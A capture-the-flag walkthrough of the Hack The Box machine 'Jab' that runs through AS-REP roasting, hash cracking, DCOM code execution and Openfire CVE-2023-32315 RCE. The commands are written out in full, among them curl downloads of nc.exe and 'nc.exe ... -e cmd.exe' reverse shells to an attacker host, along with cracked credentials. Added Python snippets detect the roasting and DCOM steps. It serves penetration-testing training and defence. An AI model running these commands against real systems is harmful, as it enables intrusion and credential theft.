Jab

OS: Windows
Difficulty: Medium
Points: 30

Nmap

nmap -v -p- -sV -sC -oN nmap.txt 10.10.11.4
Nmap scan report for 10.10.11.4
Host is up (0.095s latency).
Not shown: 65499 closed tcp ports (reset)
PORT      STATE SERVICE             VERSION
53/tcp    open  domain              Simple DNS Plus
88/tcp    open  kerberos-sec        Microsoft Windows Kerberos (server time: 2024-04-11 11:43:47Z)
135/tcp   open  msrpc               Microsoft Windows RPC
139/tcp   open  netbios-ssn         Microsoft Windows netbios-ssn
389/tcp   open  ldap                Microsoft Windows Active Directory LDAP (Domain: jab.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.jab.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.jab.htb
| Issuer: commonName=jab-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2023-11-01T20:16:18
| Not valid after:  2024-10-31T20:16:18
| MD5:   40f9:01d6:610b:2892:43ca:77de:c48d:f221
|_SHA-1: 66ea:c22b:e584:ab5e:07e3:aa8f:5af2:b634:0733:8c06
|_ssl-date: 2024-04-11T11:45:07+00:00; 0s from scanner time.
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http          Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap            Microsoft Windows Active Directory LDAP (Domain: jab.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-04-11T11:45:06+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=DC01.jab.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.jab.htb
| Issuer: commonName=jab-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2023-11-01T20:16:18
| Not valid after:  2024-10-31T20:16:18
| MD5:   40f9:01d6:610b:2892:43ca:77de:c48d:f221
|_SHA-1: 66ea:c22b:e584:ab5e:07e3:aa8f:5af2:b634:0733:8c06
3268/tcp  open  ldap                Microsoft Windows Active Directory LDAP (Domain: jab.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-04-11T11:45:07+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=DC01.jab.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.jab.htb
| Issuer: commonName=jab-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2023-11-01T20:16:18
| Not valid after:  2024-10-31T20:16:18
| MD5:   40f9:01d6:610b:2892:43ca:77de:c48d:f221
|_SHA-1: 66ea:c22b:e584:ab5e:07e3:aa8f:5af2:b634:0733:8c06
3269/tcp  open  ssl/ldap            Microsoft Windows Active Directory LDAP (Domain: jab.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.jab.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.jab.htb
| Issuer: commonName=jab-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2023-11-01T20:16:18
| Not valid after:  2024-10-31T20:16:18
| MD5:   40f9:01d6:610b:2892:43ca:77de:c48d:f221
|_SHA-1: 66ea:c22b:e584:ab5e:07e3:aa8f:5af2:b634:0733:8c06
|_ssl-date: 2024-04-11T11:45:07+00:00; 0s from scanner time.
5222/tcp  open  jabber
|_ssl-date: TLS randomness does not represent time
| xmpp-info: 
|   STARTTLS Failed
|   info: 
|     xmpp: 
|       version: 1.0
|     capabilities: 
|     errors: 
|       invalid-namespace
|       (timeout)
|     auth_mechanisms: 
|     features: 
|     stream_id: 4f6t6n3tnc
|     unknown: 
|_    compression_methods: 
| ssl-cert: Subject: commonName=dc01.jab.htb
| Subject Alternative Name: DNS:dc01.jab.htb, DNS:*.dc01.jab.htb
| Issuer: commonName=dc01.jab.htb
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-10-26T22:00:12
| Not valid after:  2028-10-24T22:00:12
| MD5:   3317:65e1:e84a:14c2:9ac4:54ba:b516:26d8
|_SHA-1: efd0:8bde:42df:ff04:1a79:7d20:bf87:a740:66b8:d966
5223/tcp  open  ssl/jabber
| ssl-cert: Subject: commonName=dc01.jab.htb
| Subject Alternative Name: DNS:dc01.jab.htb, DNS:*.dc01.jab.htb
| Issuer: commonName=dc01.jab.htb
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-10-26T22:00:12
| Not valid after:  2028-10-24T22:00:12
| MD5:   3317:65e1:e84a:14c2:9ac4:54ba:b516:26d8
|_SHA-1: efd0:8bde:42df:ff04:1a79:7d20:bf87:a740:66b8:d966
|_ssl-date: TLS randomness does not represent time
| xmpp-info: 
|   STARTTLS Failed
|   info: 
|     xmpp: 
|     capabilities: 
|     auth_mechanisms: 
|     features: 
|     errors: 
|       (timeout)
|     unknown: 
|_    compression_methods: 
5262/tcp  open  jabber
| fingerprint-strings: 
|   RPCCheck: 
|_    <stream:error xmlns:stream="http://etherx.jabber.org/streams"><not-well-formed xmlns="urn:ietf:params:xml:ns:xmpp-streams"/></stream:error></stream:stream>
5263/tcp  open  ssl/jabber
| ssl-cert: Subject: commonName=dc01.jab.htb
| Subject Alternative Name: DNS:dc01.jab.htb, DNS:*.dc01.jab.htb
| Issuer: commonName=dc01.jab.htb
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-10-26T22:00:12
| Not valid after:  2028-10-24T22:00:12
| MD5:   3317:65e1:e84a:14c2:9ac4:54ba:b516:26d8
|_SHA-1: efd0:8bde:42df:ff04:1a79:7d20:bf87:a740:66b8:d966
| xmpp-info: 
|   STARTTLS Failed
|   info: 
|     xmpp: 
|     capabilities: 
|     auth_mechanisms: 
|     features: 
|     errors: 
|       (timeout)
|     unknown: 
|_    compression_methods: 
5270/tcp  open  ssl/xmpp            Wildfire XMPP Client
| ssl-cert: Subject: commonName=dc01.jab.htb
| Subject Alternative Name: DNS:dc01.jab.htb, DNS:*.dc01.jab.htb
| Issuer: commonName=dc01.jab.htb
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-10-26T22:00:12
| Not valid after:  2028-10-24T22:00:12
| MD5:   3317:65e1:e84a:14c2:9ac4:54ba:b516:26d8
|_SHA-1: efd0:8bde:42df:ff04:1a79:7d20:bf87:a740:66b8:d966
|_ssl-date: TLS randomness does not represent time
5275/tcp  open  jabber
| xmpp-info: 
|   STARTTLS Failed
|   info: 
|     xmpp: 
|       version: 1.0
|     capabilities: 
|     errors: 
|       invalid-namespace
|       (timeout)
|     auth_mechanisms: 
|     features: 
|     stream_id: a7l130js5g
|     unknown: 
|_    compression_methods: 
5276/tcp  open  ssl/jabber
| ssl-cert: Subject: commonName=dc01.jab.htb
| Subject Alternative Name: DNS:dc01.jab.htb, DNS:*.dc01.jab.htb
| Issuer: commonName=dc01.jab.htb
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-10-26T22:00:12
| Not valid after:  2028-10-24T22:00:12
| MD5:   3317:65e1:e84a:14c2:9ac4:54ba:b516:26d8
|_SHA-1: efd0:8bde:42df:ff04:1a79:7d20:bf87:a740:66b8:d966
5985/tcp  open  http                Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
7070/tcp  open  realserver?
7443/tcp  open  ssl/oracleas-https?
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc01.jab.htb
| Subject Alternative Name: DNS:dc01.jab.htb, DNS:*.dc01.jab.htb
| Issuer: commonName=dc01.jab.htb
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-10-26T22:00:12
| Not valid after:  2028-10-24T22:00:12
| MD5:   3317:65e1:e84a:14c2:9ac4:54ba:b516:26d8
|_SHA-1: efd0:8bde:42df:ff04:1a79:7d20:bf87:a740:66b8:d966
7777/tcp  open  socks5              (No authentication; connection failed)
| socks-auth-info: 
|_  No authentication
9389/tcp  open  mc-nmf              .NET Message Framing
47001/tcp open  http                Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc               Microsoft Windows RPC
49665/tcp open  msrpc               Microsoft Windows RPC
49666/tcp open  msrpc               Microsoft Windows RPC
49667/tcp open  msrpc               Microsoft Windows RPC
49671/tcp open  msrpc               Microsoft Windows RPC
49674/tcp open  ncacn_http          Microsoft Windows RPC over HTTP 1.0
49675/tcp open  msrpc               Microsoft Windows RPC
49676/tcp open  msrpc               Microsoft Windows RPC
49681/tcp open  msrpc               Microsoft Windows RPC
49779/tcp open  msrpc               Microsoft Windows RPC
64318/tcp open  msrpc               Microsoft Windows RPC

Enumeration

Port 7070 is running the Openfire service.

If we follow the link on the web page we can get information about the technology in use.

BOSH was originally developed in the Jabber/XMPP community as a replacement for an even earlier HTTP-based technology called Jabber HTTP Polling (XEP-0025) [9]. Although BOSH assumes that the “payload” of HTTP requests and responses will be XML, the payload formats are not limited to XMPP stanzas (see XMPP Core [10]) and could contain a mixture of elements qualified by namespaces defined by different protocols (e.g., both XMPP and JSON). BOSH connection managers are generally not required to understand anything about the XML content that they transport beyond perhaps ensuring that each XML payload is qualified by the correct namespace.

XMPP Client

We need an XMPP client to connect to the server, so we will use Pidgin.

apt install pidgin
pidgin

Once we have the client we can create a user to log in.

We register our user and with that we are authenticated on the XMPP server.

XMPP Enumeration

Enumerating the server we find 2 rooms. The path to find them is as follows:

Buddies -> Join a Chat -> Room List -> Find Rooms

After checking everything in detail we can only access test2, and it contains no relevant information. However, we can obtain a list of users; the catch is that the list cannot be copied from the client, so we will obtain that information as follows.

Accounts -> Search for Users -> Search Directory
Search : *

Before pressing OK we open the debug console.

Help -> Debug Window

Now we press OK and we see the whole query it makes in the console.

We save the output and process it as follows to keep only the usernames.

cat purple-debug.log | sed 's/value>/\n/g' | cut -d '<' -f 1 | grep '@jab.htb' | cut -d '@' -f 1 | sort -u > users.txt

ASREPRoast

With the user list we can try to obtain hashes through Kerberos.

impacket-GetNPUsers -usersfile users.txt jab.htb/ -dc-ip 10.10.11.4

After a few minutes, hashes were obtained for 3 users.

jmontgomery
lbradford
mlowe
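From the defensive side, the step above is visible to the KDC: each roastable account produces a Kerberos TGT request (Security event 4768) with pre-authentication type 0, and the accounts themselves carry the DONT_REQ_PREAUTH flag in userAccountControl. The following is an added example, not code from the writeup; the record field names follow the 4768 event schema and every sample value is constructed.

```python
"""AS-REP roast detection and audit helpers (added example, not from the writeup).
Record shapes follow Windows Security event 4768 and the LDAP userAccountControl
attribute; every sample value below is constructed."""
from collections import defaultdict

DONT_REQ_PREAUTH = 0x400000  # userAccountControl flag that makes an account roastable
RC4_HMAC = "0x17"            # etype 23, the cheapest AS-REP hash to crack offline

# Constructed 4768 records: one client requests TGTs for three accounts with no
# pre-authentication, which is what GetNPUsers -usersfile looks like to the KDC.
SAMPLE_4768 = [
    {"TargetUserName": "jmontgomery", "PreAuthType": "0", "TicketEncryptionType": "0x17",
     "IpAddress": "::ffff:10.10.14.105", "Status": "0x0"},
    {"TargetUserName": "lbradford", "PreAuthType": "0", "TicketEncryptionType": "0x17",
     "IpAddress": "::ffff:10.10.14.105", "Status": "0x0"},
    {"TargetUserName": "mlowe", "PreAuthType": "0", "TicketEncryptionType": "0x17",
     "IpAddress": "::ffff:10.10.14.105", "Status": "0x0"},
    # Ordinary pre-authenticated AES logon from a domain host: not an indicator.
    {"TargetUserName": "svc_openfire", "PreAuthType": "2", "TicketEncryptionType": "0x12",
     "IpAddress": "::ffff:10.10.11.4", "Status": "0x0"},
]
# Constructed userAccountControl values (NORMAL_ACCOUNT 0x200 plus flags).
SAMPLE_UAC = {"jmontgomery": 0x410200, "lbradford": 0x400200,
              "mlowe": 0x400200, "svc_openfire": 0x10200}

def is_asrep_roast_indicator(ev):
    """A TGT issued (Status 0x0) with PreAuthType 0: the KDC returned an AS-REP
    without the client first proving knowledge of the password."""
    return ev["PreAuthType"] == "0" and ev["Status"] == "0x0"

def asrep_roast_sources(events, min_accounts=2):
    """Group no-preauth TGT requests by client address and keep sources that hit
    several distinct accounts (bulk roasting rather than one misconfigured client)."""
    by_ip = defaultdict(set)
    for ev in events:
        if is_asrep_roast_indicator(ev):
            by_ip[ev["IpAddress"]].add(ev["TargetUserName"])
    return {ip: sorted(u) for ip, u in by_ip.items() if len(u) >= min_accounts}

def rc4_roast_requests(events):
    """Narrower, high-confidence alert: no-preauth tickets requested with RC4."""
    return [ev["TargetUserName"] for ev in events
            if is_asrep_roast_indicator(ev) and ev["TicketEncryptionType"] == RC4_HMAC]

def roastable_accounts(uac_by_user):
    """Preventive audit: accounts whose userAccountControl disables pre-auth."""
    return sorted(u for u, uac in uac_by_user.items() if uac & DONT_REQ_PREAUTH)
```

The audit function is the cheaper control: clearing DONT_REQ_PREAUTH on the three accounts removes the hashes before anyone can request them.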

Crack Hash

Using john we could only recover the password for one of the hashes.

┌──(root㉿kali)-[~/htb/Jab]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 3 password hashes with 3 different salts (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 128/128 ASIMD 4x])
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Midnight_121     ($krb5asrep$23$jmontgomery@JAB.HTB)     
1g 0:00:00:13 DONE (2024-04-11 07:00) 0.07315g/s 1049Kp/s 2890Kc/s 2890KC/s !SkicA!..*7¡Vamos!
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

We use that username and password to connect over XMPP and find more credentials.

svc_openfire : !@#$%^&*(1qazxsw

Bloodhound Enumeration

We enumerate Active Directory with BloodHound so we can analyze it afterwards.

┌──(root㉿kali)-[~/htb/Jab]
└─# python3 /opt/BloodHound.py/bloodhound.py -c all -u 'svc_openfire' -p '!@#$%^&*(1qazxsw' -d jab.htb -dc DC01.jab.htb -ns 10.10.11.4
INFO: Found AD domain: jab.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: [Errno Connection error (DC01.jab.htb:88)] [Errno -2] Name or service not known
INFO: Connecting to LDAP server: DC01.jab.htb
WARNING: LDAP Authentication is refused because LDAP signing is enabled. Trying to connect over LDAPS instead...
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 502 computers
INFO: Connecting to LDAP server: DC01.jab.htb
WARNING: LDAP Authentication is refused because LDAP signing is enabled. Trying to connect over LDAPS instead...
INFO: Found 2687 users
INFO: Found 162 groups
INFO: Found 2 gpos
INFO: Found 21 ous
INFO: Found 19 containers
INFO: Found 0 trusts

Analyzing the privileges of the svc_openfire user, we can see it has ExecuteDCOM rights.

DCOM Exec

Researching DCOM we come across several blogs.

https://simondotsh.com/infosec/2021/12/29/dcom-without-admin.html
https://www.ired.team/offensive-security/lateral-movement/t1175-distributed-component-object-model
https://wadcoms.github.io/wadcoms/Impacket-DCOMExec/

We can obtain RCE as follows.

impacket-dcomexec svc_openfire@10.10.11.4 'ping -n 1 10.10.14.105' -object MMC20 -nooutput

We get a reverse shell.

# Copy nc.exe
cp /usr/share/windows-resources/binaries/nc.exe .

# Start a web server
python3 -m http.server 80

# Run the commands to get the reverse shell
impacket-dcomexec 'svc_openfire:!@#$%^&*(1qazxsw@10.10.11.4' 'mkdir c:\temp' -object MMC20 -nooutput
impacket-dcomexec 'svc_openfire:!@#$%^&*(1qazxsw@10.10.11.4' 'curl 10.10.14.105/nc.exe -o c:\temp\nc.exe' -object MMC20 -nooutput
impacket-dcomexec 'svc_openfire:!@#$%^&*(1qazxsw@10.10.11.4' 'c:\temp\nc.exe 10.10.14.105 1234 -e cmd.exe' -object MMC20 -nooutput
┌──(root㉿kali)-[~/htb/Jab]
└─# nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.10.14.105] from (UNKNOWN) [10.10.11.4] 50235
Microsoft Windows [Version 10.0.17763.5458]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\windows\system32>whoami
whoami
jab\svc_openfire
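On the target, the MMC20.Application route leaves a distinctive trace: DCOM starts mmc.exe with the -Embedding switch under the authenticating account (a type-3 network logon), and each command passed to ExecuteShellCommand appears as a child of that mmc.exe. The following detection logic is an added example, not code from the writeup; the records are constructed and shaped after Sysmon event 1 and Security event 4624 fields.

```python
"""Detect DCOM MMC20.Application lateral movement (added example, not from the writeup).
A remote ExecuteShellCommand call makes DCOM start mmc.exe with the -Embedding switch
under the authenticated account, and the requested command runs as its child. Records
below are constructed, shaped after Sysmon event 1 and Security event 4624."""
from datetime import datetime, timedelta

# Constructed Sysmon process-creation records.
SYSMON_1 = [
    {"UtcTime": "2024-04-11 12:05:02", "User": "JAB\\svc_openfire",
     "Image": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "cmd.exe /Q /c mkdir c:\\temp",
     "ParentImage": "C:\\Windows\\System32\\mmc.exe",
     "ParentCommandLine": "\"C:\\Windows\\system32\\mmc.exe\" -Embedding"},
    # An admin opening a snap-in interactively: mmc.exe child, but no -Embedding.
    {"UtcTime": "2024-04-11 12:06:10", "User": "JAB\\administrator",
     "Image": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "cmd.exe",
     "ParentImage": "C:\\Windows\\System32\\mmc.exe",
     "ParentCommandLine": "mmc.exe services.msc"},
]
# Constructed logon records; type 3 is a network logon, which is how DCOM authenticates.
SECURITY_4624 = [
    {"UtcTime": "2024-04-11 12:04:58", "LogonType": "3",
     "TargetUserName": "svc_openfire", "IpAddress": "10.10.14.105"},
    {"UtcTime": "2024-04-11 12:00:00", "LogonType": "2",
     "TargetUserName": "administrator", "IpAddress": "-"},
]

def parse_ts(s):
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S")

def mmc20_children(sysmon_events):
    """Processes spawned by an mmc.exe that DCOM launched (-Embedding), whatever
    the child is: mkdir, curl and nc.exe all arrive through cmd.exe in the writeup."""
    return [ev for ev in sysmon_events
            if ev["ParentImage"].lower().endswith("\\mmc.exe")
            and "-embedding" in ev["ParentCommandLine"].lower()]

def correlate_with_network_logon(hits, logon_events, window_s=60):
    """Attach the DCOM client's address: the most recent type-3 logon for the same
    account within window_s seconds before the child process started."""
    out = []
    for hit in hits:
        user = hit["User"].split("\\")[-1].lower()
        t = parse_ts(hit["UtcTime"])
        candidates = [lg for lg in logon_events
                      if lg["LogonType"] == "3" and lg["TargetUserName"].lower() == user
                      and timedelta(0) <= t - parse_ts(lg["UtcTime"]) <= timedelta(seconds=window_s)]
        source = max(candidates, key=lambda lg: lg["UtcTime"])["IpAddress"] if candidates else None
        out.append({"user": hit["User"], "source_ip": source, "command": hit["CommandLine"]})
    return out
```

A service account with ExecuteDCOM on a domain controller is the root cause here; the correlation only tells you which host used it.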

Privilege Escalation

Now that we are inside the machine, we identify a couple of open local ports related to Openfire.

C:\windows\system32>netstat -ano

Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    127.0.0.1:53           0.0.0.0:0              LISTENING       2620
  TCP    127.0.0.1:389          127.0.0.1:49773        ESTABLISHED     644
  TCP    127.0.0.1:9090         0.0.0.0:0              LISTENING       1268
  TCP    127.0.0.1:9091         0.0.0.0:0              LISTENING       1268

Port Forwarding

We will set up a port forward with chisel to reach that port. We download the program onto the machine.

python3 -m http.server 80
curl 10.10.14.105/chisel.exe -o c:\temp\chisel.exe

We create the tunnel as follows.

┌──(root㉿kali)-[~/htb/Jab]
└─# /opt/linux/chisel server -p 5555 --reverse 
2024/04/12 01:10:05 server: Reverse tunnelling enabled
2024/04/12 01:10:05 server: Fingerprint RwtpW0NzHQeIOhAYQTZz7Q8soOlr7aawPPFHw9pkx4I=
2024/04/12 01:10:05 server: Listening on http://0.0.0.0:5555
c:\temp>chisel.exe client 10.10.14.105:5555 R:9090:127.0.0.1:9090    
chisel.exe client 10.10.14.105:5555 R:9090:127.0.0.1:9090
2024/04/12 04:11:13 client: Connecting to ws://10.10.14.105:5555
2024/04/12 04:11:13 client: Connected (Latency 101.4635ms)

Now we can access the portal.

Openfire Remote Code Execution

Using the svc_openfire user's credentials we can access the portal.

In our initial research on Openfire we identified that RCE is possible, as the following resources describe.

https://github.com/miko550/CVE-2023-32315
https://vulncheck.com/blog/openfire-cve-2023-32315
https://github.com/K3ysTr0K3R/CVE-2023-32315-EXPLOIT

First we download the plugin openfire-management-tool-plugin.jar and upload it in the plugins section.

Once the plugin is uploaded we go to the Server Settings section and select the Management Tool option.

It will ask for a password, which is 123, and we get in. Then we select the system command option to execute commands.

We get a reverse shell and finish.

c:\temp\nc.exe 10.10.14.105 4444 -e cmd.exe